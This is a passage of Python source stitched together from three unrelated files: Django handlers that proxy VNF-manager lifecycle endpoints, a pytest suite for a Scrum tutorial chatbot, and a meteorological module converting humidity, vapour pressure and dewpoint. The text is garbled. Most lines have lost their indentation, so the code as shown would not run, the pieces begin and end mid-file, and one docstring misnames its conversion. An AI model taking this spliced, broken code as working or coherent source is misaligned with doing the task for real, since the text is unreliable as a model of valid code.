if ignorcase_get(ignorcase_get(resp, "ResponseInfo"), "vnfInstanceId"):
resp_data["vnfInfo"]["vnfInstanceId"] = ignorcase_get(ignorcase_get(resp, "ResponseInfo"), "vnfInstanceId")
logger.debug("[%s]resp_data=%s", fun_name(), resp_data)
except Exception as e:
logger.error("Error occurred when querying VNF information.")
raise e
return Response(data=resp_data, status=status.HTTP_200_OK)
# ==================================================
@api_view(http_method_names=['GET'])
def operation_status(request, *args, **kwargs):
data = {}
try:
logger.debug("[%s] request.data=%s", fun_name(), request.data)
vnfm_id = ignorcase_get(kwargs, "vnfmid")
jobId = ignorcase_get(kwargs, "jobId")
responseId = ignorcase_get(kwargs, "responseId")
ret, vnfm_info = get_vnfm_info(vnfm_id)
if ret != 0:
return Response(data={'error': ret[1]}, status=ret[2])
logger.debug("[%s] vnfm_info=%s", fun_name(), vnfm_info)
ret = call_vnfm_operation_status(vnfm_info, jobId, responseId)
if ret[0] != 0:
return Response(data={'error': ret[1]}, status=ret[2])
resp_data = json.JSONDecoder().decode(ret[1])
logger.info("[%s]resp_data=%s", fun_name(), resp_data)
'''
ResponseInfo = ignorcase_get(resp_data, "ResponseInfo")
operation_data = {}
operation_data["jobId"] = ignorcase_get(ResponseInfo, "vnfLcOpId")
operation_data["responseDescriptor"] = {}
operation_data["responseDescriptor"]["status"] = ignorcase_get(ignorcase_get(ResponseInfo, "responseDescriptor"),"lcmOperationStatus")
operation_data["responseDescriptor"]["progress"] = ignorcase_get(ignorcase_get(ResponseInfo, "responseDescriptor"),"progress")
operation_data["responseDescriptor"]["statusDescription"] = ignorcase_get(ignorcase_get(ResponseInfo, "responseDescriptor"),"statusDescription")
operation_data["responseDescriptor"]["errorCode"] = ignorcase_get(ignorcase_get(ResponseInfo, "responseDescriptor"),"errorCode")
operation_data["responseDescriptor"]["responseId"] = ignorcase_get(ignorcase_get(ResponseInfo, "responseDescriptor"),"responseId")
operation_data["responseDescriptor"]["responseHistoryList"] = ignorcase_get(ignorcase_get(ResponseInfo, "responseDescriptor"),"responseHistoryList")
'''
except Exception as e:
logger.error("Error occurred when getting operation status information.")
raise e
return Response(data=resp_data, status=status.HTTP_200_OK)
# ==================================================
grant_vnf_url = 'openoapi/nslcm/v1/ns/grantvnf'
@api_view(http_method_names=['PUT'])
def grantvnf(request, *args, **kwargs):
logger.info("=====grantvnf=====")
try:
resp_data = {}
logger.info("req_data = %s", request.data)
ret = req_by_msb(grant_vnf_url, "POST", content=json.JSONEncoder().encode(request.data))
logger.info("ret = %s", ret)
if ret[0] != 0:
return Response(data={'error': ret[1]}, status=ret[2])
resp = json.JSONDecoder().decode(ret[1])
resp_data['vimid'] = ignorcase_get(resp['vim'], 'vimid')
resp_data['tenant'] = ignorcase_get(ignorcase_get(resp['vim'], 'accessinfo'), 'tenant')
logger.info("[%s]resp_data=%s", fun_name(), resp_data)
except Exception as e:
logger.error("Error occurred in Grant VNF.")
raise e
return Response(data=resp_data, status=ret[2])
# ==================================================
@api_view(http_method_names=['POST'])
def notify(request, *args, **kwargs):
try:
logger.info("[%s]req_data = %s", fun_name(), request.data)
ret = req_by_msb(notify_url.format(vnfmid=ignorcase_get(request.data, 'VNFMID'),
vnfInstanceId=ignorcase_get(request.data, 'vnfinstanceid')),
"POST", content=json.JSONEncoder().encode(request.data))
logger.info("[%s]data = %s", fun_name(), ret)
if ret[0] != 0:
return Response(data={'error': ret[1]}, status=ret[2])
except Exception as e:
logger.error("Error occurred in LCM notification.")
raise e
return Response(data=None, status=ret[2])
@api_view(http_method_names=['GET'])
def get_vnfpkgs(request, *args, **kwargs):
logger.info("Enter %s", fun_name())
ret = req_by_msb("openoapi/nslcm/v1/vnfpackage", "GET")
if ret[0] != 0:
return Response(data={'error': ret[1]}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
resp = json.JSONDecoder().decode(ret[1])
return Response(data=resp, status=status.HTTP_200_OK)
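# --- Added flow summary (derived from the handlers above, for readability) ---
# instantiate_vnf : create the VNF on the VNFM (do_createvnf), instantiate it
#                   (do_instvnf) and return {"vnfInstanceId": ..., "jobId": ...}.
# terminate_vnf   : request termination (do_terminatevnf), poll the LCM job with
#                   wait4job() until progress reaches 100, then delete the
#                   instance (do_deletevnf).
# query_vnf, operation_status, grantvnf, notify and get_vnfpkgs proxy the
# corresponding VNFM or MSB REST endpoints whose URLs are defined at the top of
# this module.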
import json
import pytest
import workstreambot.scrum.dictionary as dict
from workstreambot.message_handler import MessageHandler
def test_guide_endless():
handler = MessageHandler({"scrum"})
response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
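    # Step through the middle themes with "Yes": the first theme was asserted
    # above and the final theme (which ends with the restart prompt) is checked
    # after this loop, hence len(dict.scrum) - 2 iterations.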
for i in range(0, len(dict.scrum) - 2):
response = send_message(handler, "Yes", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
response = send_message(handler, "Yes", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'] == 'That is it for the crash course in scrum. Would you like to restart?'
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
def test_guide_restart():
handler = MessageHandler({"scrum"})
response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
response = send_message(handler, "Yes", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
response = send_message(handler, "No", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 0
response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
@pytest.mark.skip(reason="This test will fail, because the behavior is currently not supported")
def test_guide_reenter():
handler = MessageHandler({"scrum"})
response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
response = send_message(handler, "Yes", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
response = send_message(handler, "No", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 0
response = send_message(handler, "Yes", "test_session") # TODO This input will mess up the dialogue
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 0
def test_details():
handler = MessageHandler({"scrum"})
response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
detail = "agile"
response = send_message(handler, "Tell me more about " + detail, "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain Detail
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain_detail"
assert response['dialogue'][0]['title'] == detail
assert response['dialogue'][0]['content'] == dict.scrum[theme]['details'][detail]
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], filter_details(theme, detail))
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
def test_continue_details():
handler = MessageHandler({"scrum"})
response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
detail = "agile"
response = send_message(handler, "Tell me more about " + detail, "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain Detail
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain_detail"
assert response['dialogue'][0]['title'] == detail
assert response['dialogue'][0]['content'] == dict.scrum[theme]['details'][detail]
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], filter_details(theme, detail))
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
detail = "business value"
response = send_message(handler, "Tell me more about " + detail, "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain Detail
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain_detail"
assert response['dialogue'][0]['title'] == detail
assert response['dialogue'][0]['content'] == dict.scrum[theme]['details'][detail]
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], filter_details(theme, detail))
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
def test_continue_after_detail():
handler = MessageHandler({"scrum"})
response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
detail = "agile"
response = send_message(handler, "Tell me more about " + detail, "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain Detail
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain_detail"
assert response['dialogue'][0]['title'] == detail
assert response['dialogue'][0]['content'] == dict.scrum[theme]['details'][detail]
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], filter_details(theme, detail))
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
response = send_message(handler, "Yes", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], filter_details(theme, detail))
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
def send_message(handler, message, session_id):
return json.loads(handler.converse(message, session_id))
def get_first_theme():
for theme in dict.scrum:
if dict.scrum[theme]['position'] == 1:
return theme
def get_next_theme(current_theme):
for theme in dict.scrum:
if dict.scrum[theme]['position'] == dict.scrum[current_theme]['position'] + 1:
return theme
return None
def filter_details(current_theme, current_detail):
details = []
for detail in dict.scrum[current_theme]['details']:
if detail != current_detail:
details.append(detail)
return details
def reply_options_contain_details(reply_options, details):
for detail in details:
detail_exists = False
for reply in reply_options:
if reply['reply'] == "Tell me more about " + detail:
detail_exists = True
if not detail_exists:
return False
return True
|
|
"""Conversion methods for atmospheric-moisture variables."""
import numpy
from gewittergefahr.gg_utils import temperature_conversions as temperature_conv
from gewittergefahr.gg_utils import error_checking
DRY_AIR_GAS_CONSTANT_J_KG01_K01 = 287.04
WATER_VAPOUR_GAS_CONSTANT_J_KG01_K01 = 461.5
EPSILON = DRY_AIR_GAS_CONSTANT_J_KG01_K01 / WATER_VAPOUR_GAS_CONSTANT_J_KG01_K01
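# EPSILON = R_d / R_v ~= 0.622; this ratio appears in the standard relations
# w = EPSILON * e / (p - e) and e = w * p / (EPSILON + w) used below.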
BASE_VAPOUR_PRESSURE_PASCALS = 610.78
MAGNUS_NUMERATOR_COEFF_WATER = 17.08085
MAGNUS_NUMERATOR_COEFF_ICE = 17.84362
MAGNUS_DENOMINATOR_COEFF_WATER = 234.175
MAGNUS_DENOMINATOR_COEFF_ICE = 245.425
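# The four coefficients above parametrize a Magnus-type approximation of
# saturation vapour pressure, e_s(T) = BASE_VAPOUR_PRESSURE_PASCALS *
# exp(a * T / (b + T)) with T in deg C, using separate (a, b) pairs over water
# (T >= 0 deg C) and over ice (T < 0 deg C); the dewpoint routines below apply
# this form and its inverse.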
def specific_humidity_to_mixing_ratio(specific_humidities_kg_kg01):
"""Converts each specific humidity to mixing ratio.
:param specific_humidities_kg_kg01: numpy array (any shape) of specific
humidities (kg per kg).
:return: mixing_ratios_kg_kg01: numpy array (same shape) of mixing ratios
(kg per kg).
"""
error_checking.assert_is_geq_numpy_array(
specific_humidities_kg_kg01, 0., allow_nan=True
)
return specific_humidities_kg_kg01 / (1 - specific_humidities_kg_kg01)
def mixing_ratio_to_specific_humidity(mixing_ratios_kg_kg01):
"""Converts each mixing ratio to specific humidity.
:param mixing_ratios_kg_kg01: numpy array (any shape) of mixing ratios
(kg per kg).
:return: specific_humidities_kg_kg01: numpy array (same shape) of specific
humidities (kg per kg).
"""
error_checking.assert_is_geq_numpy_array(
mixing_ratios_kg_kg01, 0., allow_nan=True
)
return mixing_ratios_kg_kg01 / (1 + mixing_ratios_kg_kg01)
def mixing_ratio_to_vapour_pressure(
mixing_ratios_kg_kg01, total_pressures_pascals):
"""Converts each mixing ratio to vapour pressure.
:param mixing_ratios_kg_kg01: numpy array (any shape) of mixing ratios
(kg per kg).
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: vapour_pressures_pascals: numpy array (same shape) of vapour
pressures.
"""
error_checking.assert_is_geq_numpy_array(
mixing_ratios_kg_kg01, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
total_pressures_pascals,
exact_dimensions=numpy.array(mixing_ratios_kg_kg01.shape, dtype=int)
)
return (
mixing_ratios_kg_kg01 * total_pressures_pascals /
(EPSILON + mixing_ratios_kg_kg01)
)
def vapour_pressure_to_mixing_ratio(
vapour_pressures_pascals, total_pressures_pascals):
"""Converts each vapour pressure to mixing ratio.
:param vapour_pressures_pascals: numpy array (any shape) of vapour
pressures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: mixing_ratios_kg_kg01: numpy array (same shape) of mixing ratios
(kg per kg).
"""
error_checking.assert_is_geq_numpy_array(
vapour_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
total_pressures_pascals,
exact_dimensions=numpy.array(vapour_pressures_pascals.shape, dtype=int)
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals - vapour_pressures_pascals, 0., allow_nan=True
)
denominators = total_pressures_pascals - vapour_pressures_pascals
mixing_ratios_kg_kg01 = EPSILON * vapour_pressures_pascals / denominators
mixing_ratios_kg_kg01[denominators <= 0] = 0
return mixing_ratios_kg_kg01
def vapour_pressure_to_dewpoint(vapour_pressures_pascals, temperatures_kelvins):
"""Converts each vapour pressure to dewpoint.
Source:
https://content.meteoblue.com/hu/specifications/weather-variables/humidity
:param vapour_pressures_pascals: numpy array (any shape) of vapour
pressures.
:param temperatures_kelvins: numpy array (same shape) of temperatures.
:return: dewpoints_kelvins: numpy array (same shape) of dewpoints.
"""
error_checking.assert_is_geq_numpy_array(
vapour_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
temperatures_kelvins, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
temperatures_kelvins,
exact_dimensions=numpy.array(vapour_pressures_pascals.shape, dtype=int)
)
logarithms = numpy.log(
vapour_pressures_pascals / BASE_VAPOUR_PRESSURE_PASCALS
)
temperatures_deg_c = temperature_conv.kelvins_to_celsius(
temperatures_kelvins
)
numerator_coeffs = numpy.full(
temperatures_deg_c.shape, MAGNUS_DENOMINATOR_COEFF_WATER
)
numerator_coeffs[temperatures_deg_c < 0] = MAGNUS_DENOMINATOR_COEFF_ICE
numerators = numerator_coeffs * logarithms
denominator_coeffs = numpy.full(
temperatures_deg_c.shape, MAGNUS_NUMERATOR_COEFF_WATER
)
denominator_coeffs[temperatures_deg_c < 0] = MAGNUS_NUMERATOR_COEFF_ICE
denominators = denominator_coeffs - logarithms
dewpoints_deg_c = numerators / denominators
dewpoints_deg_c[numpy.invert(numpy.isfinite(dewpoints_deg_c))] = (
-temperature_conv.CELSIUS_TO_KELVINS_ADDEND
)
dewpoints_kelvins = temperature_conv.celsius_to_kelvins(dewpoints_deg_c)
dewpoints_kelvins[dewpoints_deg_c + numerator_coeffs < 0] = 0.
return dewpoints_kelvins
def dewpoint_to_vapour_pressure(dewpoints_kelvins, temperatures_kelvins,
total_pressures_pascals):
"""Converts each dewpoint to vapour pressure.
Source:
https://content.meteoblue.com/hu/specifications/weather-variables/humidity
:param dewpoints_kelvins: numpy array (any shape) of dewpoints.
:param temperatures_kelvins: numpy array (same shape) of temperatures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: vapour_pressures_pascals: numpy array (same shape) of vapour
pressures.
"""
error_checking.assert_is_geq_numpy_array(
dewpoints_kelvins, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
temperatures_kelvins, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
temperatures_kelvins,
exact_dimensions=numpy.array(dewpoints_kelvins.shape, dtype=int)
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
total_pressures_pascals,
exact_dimensions=numpy.array(dewpoints_kelvins.shape, dtype=int)
)
dewpoints_deg_c = temperature_conv.kelvins_to_celsius(dewpoints_kelvins)
temperatures_deg_c = temperature_conv.kelvins_to_celsius(
temperatures_kelvins
)
numerator_coeffs = numpy.full(
temperatures_deg_c.shape, MAGNUS_NUMERATOR_COEFF_WATER
)
numerator_coeffs[temperatures_deg_c < 0] = MAGNUS_NUMERATOR_COEFF_ICE
numerators = numerator_coeffs * dewpoints_deg_c
denominator_coeffs = numpy.full(
temperatures_deg_c.shape, MAGNUS_DENOMINATOR_COEFF_WATER
)
denominator_coeffs[temperatures_deg_c < 0] = MAGNUS_DENOMINATOR_COEFF_ICE
denominators = denominator_coeffs + dewpoints_deg_c
vapour_pressures_pascals = (
BASE_VAPOUR_PRESSURE_PASCALS * numpy.exp(numerators / denominators)
)
vapour_pressures_pascals[
numpy.invert(numpy.isfinite(vapour_pressures_pascals))
] = 0.
vapour_pressures_pascals[denominators <= 0] = 0.
return numpy.minimum(vapour_pressures_pascals, total_pressures_pascals)
def specific_humidity_to_dewpoint(
specific_humidities_kg_kg01, temperatures_kelvins,
total_pressures_pascals):
"""Converts each specific humidity to dewpoint.
:param specific_humidities_kg_kg01: numpy array (any shape) of specific
humidities (kg per kg).
:param temperatures_kelvins: numpy array (same shape) of temperatures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: dewpoints_kelvins: numpy array (same shape) of dewpoints.
"""
mixing_ratios_kg_kg01 = specific_humidity_to_mixing_ratio(
specific_humidities_kg_kg01
)
vapour_pressures_pascals = mixing_ratio_to_vapour_pressure(
mixing_ratios_kg_kg01=mixing_ratios_kg_kg01,
total_pressures_pascals=total_pressures_pascals
)
return vapour_pressure_to_dewpoint(
vapour_pressures_pascals=vapour_pressures_pascals,
temperatures_kelvins=temperatures_kelvins
)
def dewpoint_to_specific_humidity(
dewpoints_kelvins, temperatures_kelvins, total_pressures_pascals):
"""Converts each dewpoint to specific humidity.
:param dewpoints_kelvins: numpy array (any shape) of dewpoints.
:param temperatures_kelvins: numpy array (same shape) of temperatures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: specific_humidities_kg_kg01: numpy array (same shape) of specific
humidities (kg per kg).
"""
vapour_pressures_pascals = dewpoint_to_vapour_pressure(
dewpoints_kelvins=dewpoints_kelvins,
temperatures_kelvins=temperatures_kelvins,
total_pressures_pascals=total_pressures_pascals
)
mixing_ratios_kg_kg01 = vapour_pressure_to_mixing_ratio(
vapour_pressures_pascals=vapour_pressures_pascals,
total_pressures_pascals=total_pressures_pascals
)
return mixing_ratio_to_specific_humidity(mixing_ratios_kg_kg01)
def relative_humidity_to_dewpoint(
relative_humidities, temperatures_kelvins, total_pressures_pascals):
"""Converts each relative humidity to dewpoint.
:param relative_humidities: numpy array (any shape) of relative humidities
(unitless).
:param temperatures_kelvins: numpy array (same shape) of temperatures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: dewpoints_kelvins: numpy array (same shape) of dewpoints.
"""
error_checking.assert_is_geq_numpy_array(
relative_humidities, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
temperatures_kelvins, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
temperatures_kelvins,
exact_dimensions=numpy.array(relative_humidities.shape, dtype=int)
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
total_pressures_pascals,
exact_dimensions=numpy.array(relative_humidities.shape, dtype=int)
)
saturated_vapour_pressures_pascals = dewpoint_to_vapour_pressure(
dewpoints_kelvins=temperatures_kelvins,
temperatures_kelvins=temperatures_kelvins,
total_pressures_pascals=total_pressures_pascals
)
saturated_mixing_ratios_kg_kg01 = vapour_pressure_to_mixing_ratio(
vapour_pressures_pascals=saturated_vapour_pressures_pascals,
total_pressures_pascals=total_pressures_pascals
)
vapour_pressures_pascals = mixing_ratio_to_vapour_pressure(
mixing_ratios_kg_kg01=
relative_humidities * saturated_mixing_ratios_kg_kg01,
total_pressures_pascals=total_pressures_pascals
)
return vapour_pressure_to_dewpoint(
vapour_pressures_pascals=vapour_pressures_pascals,
temperatures_kelvins=temperatures_kelvins
)
def dewpoint_to_relative_humidity(
dewpoints_kelvins, temperatures_kelvins, total_pressures_pascals):
"""Converts each dewpoint to specific humidity.
:param dewpoints_kelvins: numpy array (any shape) of dewpoints.
:param temperatures_kelvins: numpy array (same shape) of temperatures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: relative_humidities: numpy array (same shape) of relative
humidities (unitless).
"""
error_checking.assert_is_geq_numpy_array(
dewpoints_kelvins, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
temperatures_kelvins, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
temperatures_kelvins,
exact_dimensions=numpy.array(dewpoints_kelvins.shape, dtype=int)
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
total_pressures_pascals,
exact_dimensions=numpy.array(dewpoints_kelvins.shape, dtype=int)
)
vapour_pressures_pascals = dewpoint_to_vapour_pressure(
dewpoints_kelvins=dewpoints_kelvins,
temperatures_kelvins=temperatures_kelvins,
total_pressures_pascals=total_pressures_pascals
)
mixing_ratios_kg_kg01 = vapour_pressure_to_mixing_ratio(
vapour_pressures_pascals=vapour_pressures_pascals,
total_pressures_pascals=total_pressures_pascals
)
saturated_vapour_pressures_pascals = dewpoint_to_vapour_pressure(
dewpoints_kelvins=temperatures_kelvins,
temperatures_kelvins=temperatures_kelvins,
total_pressures_pascals=total_pressures_pascals
)
saturated_mixing_ratios_kg_kg01 = vapour_pressure_to_mixing_ratio(
vapour_pressures_pascals=saturated_vapour_pressures_pascals,
total_pressures_pascals=total_pressures_pascals
)
relative_humidities = (
mixing_ratios_kg_kg01 / saturated_mixing_ratios_kg_kg01
)
relative_humidities[numpy.invert(numpy.isfinite(relative_humidities))] = 0.
return relative_humidities
def temperature_to_virtual_temperature(
temperatures_kelvins, total_pressures_pascals,
vapour_pressures_pascals):
"""Converts each temperature to virtual temperature.
:param temperatures_kelvins: numpy array (any shape) of temperatures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:param vapour_pressures_pascals: numpy array (same shape) of vapour
pressures.
:return: virtual_temperatures_kelvins: numpy array (same shape) of virtual
temperatures.
"""
error_checking.assert_is_geq_numpy_array(
temperatures_kelvins, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals, 0., allow_nan=True
)
